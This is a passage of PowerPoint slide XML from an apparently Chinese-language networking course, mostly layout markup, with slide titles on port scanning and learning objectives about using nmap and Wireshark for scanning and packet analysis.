              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="92" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:extLst>
                <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                  <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="12700">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a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="Gill Sans" charset="0"/>
                  <a:sym typeface="Gill Sans" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Text Placeholder 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16635" y="6800"/>
              <a:ext cx="1600" cy="484"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" baseline="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0">
                <a:buNone/>
                <a:defRPr sz="1200"/>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0">
                <a:buNone/>
                <a:defRPr sz="1000"/>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl5pPr>
              <a:lvl6pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl6pPr>
              <a:lvl7pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl7pPr>
              <a:lvl8pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl8pPr>
              <a:lvl9pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>项目评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4505325" y="1420495"/>
            <a:ext cx="2266950" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学习路径</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tn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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="7602220" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.能够掌握nmap工具进行端口扫描。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.能够使用Wirshark工具抓取数据包进行分析。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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6" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
